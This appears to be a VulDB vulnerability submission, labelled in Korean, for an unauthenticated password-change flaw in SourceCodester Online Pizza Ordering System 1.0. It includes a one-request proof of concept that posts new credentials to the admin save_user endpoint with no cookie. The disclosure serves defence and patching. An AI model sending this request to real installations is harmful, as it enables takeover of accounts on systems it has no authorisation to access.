| 제목 | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 Unauthorized Password Modification |
|---|
| 설명 | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 has an Unauthorized Password Modification vulnerability, the vulnerability is due to access control weakness. Remote and unauthenticated attacker can change the password directly without login.
There is a poc below :
POST /php-opos/admin/ajax.php?action=save_user HTTP/1.1
*********************************(without cookie in header)
id=2&name=Staff&username=staff&password=abcdefg&type=2
Then the password will be changed to 'abcdefg' without authentication. |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 17. AM 08:33 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 17. AM 08:51 (17 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223305 [SourceCodester Online Pizza Ordering System 1.0 Password Change ajax.php?action=save_user 약한 인증] |
|---|
| 포인트들 | 20 |
|---|